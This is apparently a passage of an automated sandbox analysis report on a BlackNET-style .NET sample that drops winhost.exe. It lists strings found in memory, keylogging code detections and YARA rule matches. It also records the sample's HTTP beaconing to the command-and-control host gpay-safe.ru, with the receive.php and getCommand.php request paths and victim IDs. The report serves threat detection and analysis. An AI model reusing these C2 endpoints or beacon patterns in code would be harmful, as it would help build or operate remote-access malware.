Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000002.670511063.000000001D122000.00000004.00000001.sdmp, 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000003.651567513.000000001BED7000.00000004.00000001.sdmp, winhost.exe, 00000008.00000002.680915248.000000001BD90000.00000002.00000001.sdmp, 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 0000000C.00000002.705052799.000000001BEB0000.00000002.00000001.sdmp, winhost.exe, 00000010.00000002.715029058.000000001C130000.00000002.00000001.sdmp, winhost.exe, 00000013.00000002.724095756.000000001B760000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000002.670511063.000000001D122000.00000004.00000001.sdmp, winhost.exe, 00000008.00000002.680915248.000000001BD90000.00000002.00000001.sdmp, 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 0000000C.00000002.705052799.000000001BEB0000.00000002.00000001.sdmp, winhost.exe, 00000010.00000002.715029058.000000001C130000.00000002.00000001.sdmp, winhost.exe, 00000013.00000002.724095756.000000001B760000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000002.670511063.000000001D122000.00000004.00000001.sdmp, winhost.exe, 00000008.00000002.680915248.000000001BD90000.00000002.00000001.sdmp, 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 0000000C.00000002.705052799.000000001BEB0000.00000002.00000001.sdmp, winhost.exe, 00000010.00000002.715029058.000000001C130000.00000002.00000001.sdmp, winhost.exe, 00000013.00000002.724095756.000000001B760000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000002.670511063.000000001D122000.00000004.00000001.sdmp, winhost.exe, 00000008.00000002.680915248.000000001BD90000.00000002.00000001.sdmp, 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 0000000C.00000002.705052799.000000001BEB0000.00000002.00000001.sdmp, winhost.exe, 00000010.00000002.715029058.000000001C130000.00000002.00000001.sdmp, winhost.exe, 00000013.00000002.724095756.000000001B760000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000003.651132557.000000001BED7000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designersP
Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000002.670511063.000000001D122000.00000004.00000001.sdmp, winhost.exe, 00000008.00000002.680915248.000000001BD90000.00000002.00000001.sdmp, 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 0000000C.00000002.705052799.000000001BEB0000.00000002.00000001.sdmp, winhost.exe, 00000010.00000002.715029058.000000001C130000.00000002.00000001.sdmp, winhost.exe, 00000013.00000002.724095756.000000001B760000.00000002.00000001.sdmp | String found in binary or memory: http://www.fonts.com
Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000002.670511063.000000001D122000.00000004.00000001.sdmp, winhost.exe, 00000008.00000002.680915248.000000001BD90000.00000002.00000001.sdmp, 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 0000000C.00000002.705052799.000000001BEB0000.00000002.00000001.sdmp, winhost.exe, 00000010.00000002.715029058.000000001C130000.00000002.00000001.sdmp, winhost.exe, 00000013.00000002.724095756.000000001B760000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000002.670511063.000000001D122000.00000004.00000001.sdmp, winhost.exe, 00000008.00000002.680915248.000000001BD90000.00000002.00000001.sdmp, 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 0000000C.00000002.705052799.000000001BEB0000.00000002.00000001.sdmp, winhost.exe, 00000010.00000002.715029058.000000001C130000.00000002.00000001.sdmp, winhost.exe, 00000013.00000002.724095756.000000001B760000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000002.670511063.000000001D122000.00000004.00000001.sdmp, winhost.exe, 00000008.00000002.680915248.000000001BD90000.00000002.00000001.sdmp, 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 0000000C.00000002.705052799.000000001BEB0000.00000002.00000001.sdmp, winhost.exe, 00000010.00000002.715029058.000000001C130000.00000002.00000001.sdmp, winhost.exe, 00000013.00000002.724095756.000000001B760000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000002.670511063.000000001D122000.00000004.00000001.sdmp, winhost.exe, 00000008.00000002.680915248.000000001BD90000.00000002.00000001.sdmp, 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 0000000C.00000002.705052799.000000001BEB0000.00000002.00000001.sdmp, winhost.exe, 00000010.00000002.715029058.000000001C130000.00000002.00000001.sdmp, winhost.exe, 00000013.00000002.724095756.000000001B760000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000002.670511063.000000001D122000.00000004.00000001.sdmp, winhost.exe, 00000008.00000002.680915248.000000001BD90000.00000002.00000001.sdmp, 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 0000000C.00000002.705052799.000000001BEB0000.00000002.00000001.sdmp, winhost.exe, 00000010.00000002.715029058.000000001C130000.00000002.00000001.sdmp, winhost.exe, 00000013.00000002.724095756.000000001B760000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                  Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000002.670511063.000000001D122000.00000004.00000001.sdmp, winhost.exe, 00000008.00000002.680915248.000000001BD90000.00000002.00000001.sdmp, 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 0000000C.00000002.705052799.000000001BEB0000.00000002.00000001.sdmp, winhost.exe, 00000010.00000002.715029058.000000001C130000.00000002.00000001.sdmp, winhost.exe, 00000013.00000002.724095756.000000001B760000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
                  Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000002.670511063.000000001D122000.00000004.00000001.sdmp, winhost.exe, 00000008.00000002.680915248.000000001BD90000.00000002.00000001.sdmp, 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 0000000C.00000002.705052799.000000001BEB0000.00000002.00000001.sdmp, winhost.exe, 00000010.00000002.715029058.000000001C130000.00000002.00000001.sdmp, winhost.exe, 00000013.00000002.724095756.000000001B760000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                  Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000002.670511063.000000001D122000.00000004.00000001.sdmp, winhost.exe, 00000008.00000002.680915248.000000001BD90000.00000002.00000001.sdmp, 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 0000000C.00000002.705052799.000000001BEB0000.00000002.00000001.sdmp, winhost.exe, 00000010.00000002.715029058.000000001C130000.00000002.00000001.sdmp, winhost.exe, 00000013.00000002.724095756.000000001B760000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
                  Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000002.670511063.000000001D122000.00000004.00000001.sdmp, winhost.exe, 00000008.00000002.680915248.000000001BD90000.00000002.00000001.sdmp, 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 0000000C.00000002.705052799.000000001BEB0000.00000002.00000001.sdmp, winhost.exe, 00000010.00000002.715029058.000000001C130000.00000002.00000001.sdmp, winhost.exe, 00000013.00000002.724095756.000000001B760000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
                  Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000002.670511063.000000001D122000.00000004.00000001.sdmp, winhost.exe, 00000008.00000002.680915248.000000001BD90000.00000002.00000001.sdmp, 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 0000000C.00000002.705052799.000000001BEB0000.00000002.00000001.sdmp, winhost.exe, 00000010.00000002.715029058.000000001C130000.00000002.00000001.sdmp, winhost.exe, 00000013.00000002.724095756.000000001B760000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
                  Source: winhost.exe, 00000013.00000002.724095756.000000001B760000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
                  Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000003.647017703.000000001BECF000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.com8
                  Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000002.670511063.000000001D122000.00000004.00000001.sdmp, winhost.exe, 00000008.00000002.680915248.000000001BD90000.00000002.00000001.sdmp, 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 0000000C.00000002.705052799.000000001BEB0000.00000002.00000001.sdmp, winhost.exe, 00000010.00000002.715029058.000000001C130000.00000002.00000001.sdmp, winhost.exe, 00000013.00000002.724095756.000000001B760000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
                  Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000002.670511063.000000001D122000.00000004.00000001.sdmp, winhost.exe, 00000008.00000002.680915248.000000001BD90000.00000002.00000001.sdmp, 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 0000000C.00000002.705052799.000000001BEB0000.00000002.00000001.sdmp, winhost.exe, 00000010.00000002.715029058.000000001C130000.00000002.00000001.sdmp, winhost.exe, 00000013.00000002.724095756.000000001B760000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                  Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 00000000.00000002.670511063.000000001D122000.00000004.00000001.sdmp, winhost.exe, 00000008.00000002.680915248.000000001BD90000.00000002.00000001.sdmp, 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, 0000000C.00000002.705052799.000000001BEB0000.00000002.00000001.sdmp, winhost.exe, 00000010.00000002.715029058.000000001C130000.00000002.00000001.sdmp, winhost.exe, 00000013.00000002.724095756.000000001B760000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                  Source: unknown | DNS traffic detected: queries for: gpay-safe.ru
                  Source: global traffic | HTTP traffic detected: GET /x/ HTTP/1.1; Host: gpay-safe.ru; Connection: Keep-Alive
                  Source: global traffic | HTTP traffic detected: GET /x//receive.php?command=VW5pbnN0YWxs&vicID=SGFDa182NUYxRDNBOQ HTTP/1.1; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36; Host: gpay-safe.ru
                  Source: global traffic | HTTP traffic detected: GET /x//getCommand.php?id=SGFDa182NUYxRDNBOQ HTTP/1.1; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36; Host: gpay-safe.ru
                  Source: global traffic | HTTP traffic detected: GET /x/ HTTP/1.1; Host: gpay-safe.ru; Connection: Keep-Alive
                  Source: global traffic | HTTP traffic detected: GET /x//receive.php?command=VW5pbnN0YWxs&vicID=SGFDa182NUYxRDNBOQ HTTP/1.1; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36; Host: gpay-safe.ru
                  Source: global traffic | HTTP traffic detected: GET /x//receive.php?command=T25saW5l&vicID=SGFDa182NUYxRDNBOQ HTTP/1.1; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36; Host: gpay-safe.ru
                  Source: global traffic | HTTP traffic detected: GET /x//getCommand.php?id=SGFDa182NUYxRDNBOQ HTTP/1.1; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36; Host: gpay-safe.ru
                  Source: global traffic | HTTP traffic detected: GET /x/ HTTP/1.1; Host: gpay-safe.ru; Connection: Keep-Alive
                  Source: global traffic | HTTP traffic detected: GET /x//receive.php?command=VW5pbnN0YWxs&vicID=SGFDa182NUYxRDNBOQ HTTP/1.1; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36; Host: gpay-safe.ru
                  Source: global traffic | HTTP traffic detected: GET /x//getCommand.php?id=SGFDa182NUYxRDNBOQ HTTP/1.1; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36; Host: gpay-safe.ru
                  Source: global traffic | HTTP traffic detected: GET /x/ HTTP/1.1; Host: gpay-safe.ru; Connection: Keep-Alive
                  Source: global traffic | HTTP traffic detected: GET /x//receive.php?command=VW5pbnN0YWxs&vicID=SGFDa182NUYxRDNBOQ HTTP/1.1; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36; Host: gpay-safe.ru
                  Source: global traffic | HTTP traffic detected: GET /x//receive.php?command=T25saW5l&vicID=SGFDa182NUYxRDNBOQ HTTP/1.1; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36; Host: gpay-safe.ru
                  Source: global traffic | HTTP traffic detected: GET /x//getCommand.php?id=SGFDa182NUYxRDNBOQ HTTP/1.1; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36; Host: gpay-safe.ru
                  Source: global traffic | HTTP traffic detected: GET /x/ HTTP/1.1; Host: gpay-safe.ru; Connection: Keep-Alive
                  Source: global traffic | HTTP traffic detected: GET /x//receive.php?command=VW5pbnN0YWxs&vicID=SGFDa182NUYxRDNBOQ HTTP/1.1; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36; Host: gpay-safe.ru
                  Source: global traffic | HTTP traffic detected: GET /x//receive.php?command=T25saW5l&vicID=SGFDa182NUYxRDNBOQ HTTP/1.1; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36; Host: gpay-safe.ru
                  Source: global traffic | HTTP traffic detected: GET /x//getCommand.php?id=SGFDa182NUYxRDNBOQ HTTP/1.1; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36; Host: gpay-safe.ru

                  Key, Mouse, Clipboard, Microphone and Screen Capturing:

                  Contains functionality to log keystrokes (.Net Source)
                  Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, svchost/Other/LimeLogger.cs | .Net Code: KeyboardLayout
                  Source: winhost.exe.0.dr, svchost/Other/LimeLogger.cs | .Net Code: KeyboardLayout
                  Source: 0.2.4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe.9b0000.0.unpack, svchost/Other/LimeLogger.cs | .Net Code: KeyboardLayout
                  Source: 0.0.4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe.9b0000.0.unpack, svchost/Other/LimeLogger.cs | .Net Code: KeyboardLayout
                  Source: 8.0.winhost.exe.720000.0.unpack, svchost/Other/LimeLogger.cs | .Net Code: KeyboardLayout
                  Source: 8.2.winhost.exe.720000.0.unpack, svchost/Other/LimeLogger.cs | .Net Code: KeyboardLayout
                  Source: winhost.exe.12.dr, svchost/Other/LimeLogger.cs | .Net Code: KeyboardLayout
                  Source: 12.2.4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe.810000.0.unpack, svchost/Other/LimeLogger.cs | .Net Code: KeyboardLayout
                  Source: 12.0.4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe.810000.0.unpack, svchost/Other/LimeLogger.cs | .Net Code: KeyboardLayout
                  Source: 16.2.winhost.exe.ae0000.0.unpack, svchost/Other/LimeLogger.cs | .Net Code: KeyboardLayout
                  Source: 16.0.winhost.exe.ae0000.0.unpack, svchost/Other/LimeLogger.cs | .Net Code: KeyboardLayout
                  Source: 19.0.winhost.exe.160000.0.unpack, svchost/Other/LimeLogger.cs | .Net Code: KeyboardLayout
                  Source: 19.2.winhost.exe.160000.0.unpack, svchost/Other/LimeLogger.cs | .Net Code: KeyboardLayout

                  System Summary:

                  Malicious sample detected (through community Yara rule)
                  Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, type: SAMPLE | Matched rule: Detects malware from disclosed CN malware set | Author: Florian Roth
                  Source: 19.2.winhost.exe.160000.0.unpack, type: UNPACKEDPE | Matched rule: Detects malware from disclosed CN malware set | Author: Florian Roth
                  Source: 19.0.winhost.exe.160000.0.unpack, type: UNPACKEDPE | Matched rule: Detects malware from disclosed CN malware set | Author: Florian Roth
                  Source: 0.2.4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe.9b0000.0.unpack, type: UNPACKEDPE | Matched rule: Detects malware from disclosed CN malware set | Author: Florian Roth
                  Source: 12.2.4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe.810000.0.unpack, type: UNPACKEDPE | Matched rule: Detects malware from disclosed CN malware set | Author: Florian Roth
                  Source: 16.2.winhost.exe.ae0000.0.unpack, type: UNPACKEDPE | Matched rule: Detects malware from disclosed CN malware set | Author: Florian Roth
                  Source: 0.0.4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe.9b0000.0.unpack, type: UNPACKEDPE | Matched rule: Detects malware from disclosed CN malware set | Author: Florian Roth
                  Source: 16.0.winhost.exe.ae0000.0.unpack, type: UNPACKEDPE | Matched rule: Detects malware from disclosed CN malware set | Author: Florian Roth
                  Source: 12.0.4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe.810000.0.unpack, type: UNPACKEDPE | Matched rule: Detects malware from disclosed CN malware set | Author: Florian Roth
                  Source: 8.2.winhost.exe.720000.0.unpack, type: UNPACKEDPE | Matched rule: Detects malware from disclosed CN malware set | Author: Florian Roth
                  Source: 8.0.winhost.exe.720000.0.unpack, type: UNPACKEDPE | Matched rule: Detects malware from disclosed CN malware set | Author: Florian Roth
                  Source: dropped/winhost.exe, type: DROPPED | Matched rule: Detects malware from disclosed CN malware set | Author: Florian Roth
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft\MyClient\winhost.exe, type: DROPPED | Matched rule: Detects malware from disclosed CN malware set | Author: Florian Roth
                  Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                  Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, type: SAMPLE | Matched rule: SUSP_Modified_SystemExeFileName_in_File (date = 2018-12-11, hash2 = f1f11830b60e6530b680291509ddd9b5a1e5f425550444ec964a08f5f0c1a44e, author = Florian Roth, description = Detects a variant of a system file name often used by attackers to cloak their activity, reference = https://www.symantec.com/blogs/threat-intelligence/seedworm-espionage-group, score = 5723f425e0c55c22c6b8bb74afb6b506943012c33b9ec1c928a71307a8c5889a)
                  Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, type: SAMPLE | Matched rule: MAL_Winnti_Sample_May18_1 (date = 2018-05-04, hash1 = 528d9eaaac67716e6b37dd562770190318c8766fa1b2f33c0974f7d5f6725d41, author = Florian Roth, description = Detects malware sample from Burning Umbrella report - Generic Winnti Rule, reference = https://401trg.pw/burning-umbrella/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE)
                  Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, type: SAMPLE | Matched rule: CN_disclosed_20180208_c (date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE)
                  Source: 4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe, type: SAMPLE | Matched rule: HKTL_NET_GUID_BlackNET (date = 2020-12-30, author = Arnim Rupp, description = Detects VB.NET red/black-team tools via typelibguid, reference = https://github.com/BlackHacker511/BlackNET, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE)
                  Source: 19.2.winhost.exe.160000.0.unpack, type: UNPACKEDPE | Matched rule: SUSP_Modified_SystemExeFileName_in_File (date = 2018-12-11, hash2 = f1f11830b60e6530b680291509ddd9b5a1e5f425550444ec964a08f5f0c1a44e, author = Florian Roth, description = Detects a variant of a system file name often used by attackers to cloak their activity, reference = https://www.symantec.com/blogs/threat-intelligence/seedworm-espionage-group, score = 5723f425e0c55c22c6b8bb74afb6b506943012c33b9ec1c928a71307a8c5889a)
                  Source: 19.2.winhost.exe.160000.0.unpack, type: UNPACKEDPE | Matched rule: MAL_Winnti_Sample_May18_1 (date = 2018-05-04, hash1 = 528d9eaaac67716e6b37dd562770190318c8766fa1b2f33c0974f7d5f6725d41, author = Florian Roth, description = Detects malware sample from Burning Umbrella report - Generic Winnti Rule, reference = https://401trg.pw/burning-umbrella/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE)
                  Source: 19.2.winhost.exe.160000.0.unpack, type: UNPACKEDPE | Matched rule: CN_disclosed_20180208_c (date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE)
                  Source: 19.2.winhost.exe.160000.0.unpack, type: UNPACKEDPE | Matched rule: HKTL_NET_GUID_BlackNET (date = 2020-12-30, author = Arnim Rupp, description = Detects VB.NET red/black-team tools via typelibguid, reference = https://github.com/BlackHacker511/BlackNET, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE)
                  Source: 19.0.winhost.exe.160000.0.unpack, type: UNPACKEDPE | Matched rule: SUSP_Modified_SystemExeFileName_in_File (date = 2018-12-11, hash2 = f1f11830b60e6530b680291509ddd9b5a1e5f425550444ec964a08f5f0c1a44e, author = Florian Roth, description = Detects a variant of a system file name often used by attackers to cloak their activity, reference = https://www.symantec.com/blogs/threat-intelligence/seedworm-espionage-group, score = 5723f425e0c55c22c6b8bb74afb6b506943012c33b9ec1c928a71307a8c5889a)
                  Source: 19.0.winhost.exe.160000.0.unpack, type: UNPACKEDPE | Matched rule: MAL_Winnti_Sample_May18_1 (date = 2018-05-04, hash1 = 528d9eaaac67716e6b37dd562770190318c8766fa1b2f33c0974f7d5f6725d41, author = Florian Roth, description = Detects malware sample from Burning Umbrella report - Generic Winnti Rule, reference = https://401trg.pw/burning-umbrella/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE)
                  Source: 19.0.winhost.exe.160000.0.unpack, type: UNPACKEDPE | Matched rule: CN_disclosed_20180208_c (date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE)
                  Source: 19.0.winhost.exe.160000.0.unpack, type: UNPACKEDPE | Matched rule: HKTL_NET_GUID_BlackNET (date = 2020-12-30, author = Arnim Rupp, description = Detects VB.NET red/black-team tools via typelibguid, reference = https://github.com/BlackHacker511/BlackNET, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE)
                  Source: 0.2.4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe.9b0000.0.unpack, type: UNPACKEDPE | Matched rule: SUSP_Modified_SystemExeFileName_in_File (date = 2018-12-11, hash2 = f1f11830b60e6530b680291509ddd9b5a1e5f425550444ec964a08f5f0c1a44e, author = Florian Roth, description = Detects a variant of a system file name often used by attackers to cloak their activity, reference = https://www.symantec.com/blogs/threat-intelligence/seedworm-espionage-group, score = 5723f425e0c55c22c6b8bb74afb6b506943012c33b9ec1c928a71307a8c5889a)
                  Source: 0.2.4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe.9b0000.0.unpack, type: UNPACKEDPE | Matched rule: MAL_Winnti_Sample_May18_1 (date = 2018-05-04, hash1 = 528d9eaaac67716e6b37dd562770190318c8766fa1b2f33c0974f7d5f6725d41, author = Florian Roth, description = Detects malware sample from Burning Umbrella report - Generic Winnti Rule, reference = https://401trg.pw/burning-umbrella/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE)
                  Source: 0.2.4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe.9b0000.0.unpack, type: UNPACKEDPE | Matched rule: CN_disclosed_20180208_c (date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE)
                  Source: 0.2.4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe.9b0000.0.unpack, type: UNPACKEDPE | Matched rule: HKTL_NET_GUID_BlackNET (date = 2020-12-30, author = Arnim Rupp, description = Detects VB.NET red/black-team tools via typelibguid, reference = https://github.com/BlackHacker511/BlackNET, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE)
                  Source: 12.2.4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe.810000.0.unpack, type: UNPACKEDPE | Matched rule: SUSP_Modified_SystemExeFileName_in_File (date = 2018-12-11, hash2 = f1f11830b60e6530b680291509ddd9b5a1e5f425550444ec964a08f5f0c1a44e, author = Florian Roth, description = Detects a variant of a system file name often used by attackers to cloak their activity, reference = https://www.symantec.com/blogs/threat-intelligence/seedworm-espionage-group, score = 5723f425e0c55c22c6b8bb74afb6b506943012c33b9ec1c928a71307a8c5889a)
                  Source: 12.2.4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe.810000.0.unpack, type: UNPACKEDPE | Matched rule: MAL_Winnti_Sample_May18_1 (date = 2018-05-04, hash1 = 528d9eaaac67716e6b37dd562770190318c8766fa1b2f33c0974f7d5f6725d41, author = Florian Roth, description = Detects malware sample from Burning Umbrella report - Generic Winnti Rule, reference = https://401trg.pw/burning-umbrella/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE)
                  Source: 12.2.4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe.810000.0.unpack, type: UNPACKEDPE | Matched rule: CN_disclosed_20180208_c (date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE)
                  Source: 12.2.4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe.810000.0.unpack, type: UNPACKEDPE | Matched rule: HKTL_NET_GUID_BlackNET (date = 2020-12-30, author = Arnim Rupp, description = Detects VB.NET red/black-team tools via typelibguid, reference = https://github.com/BlackHacker511/BlackNET, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE)
                  Source: 16.2.winhost.exe.ae0000.0.unpack, type: UNPACKEDPE | Matched rule: SUSP_Modified_SystemExeFileName_in_File (date = 2018-12-11, hash2 = f1f11830b60e6530b680291509ddd9b5a1e5f425550444ec964a08f5f0c1a44e, author = Florian Roth, description = Detects a variant of a system file name often used by attackers to cloak their activity, reference = https://www.symantec.com/blogs/threat-intelligence/seedworm-espionage-group, score = 5723f425e0c55c22c6b8bb74afb6b506943012c33b9ec1c928a71307a8c5889a)
